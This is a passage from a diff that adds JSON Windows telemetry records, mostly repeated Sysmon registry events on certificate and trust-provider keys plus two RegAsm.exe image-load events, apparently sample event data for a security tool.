"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867310016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570867930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 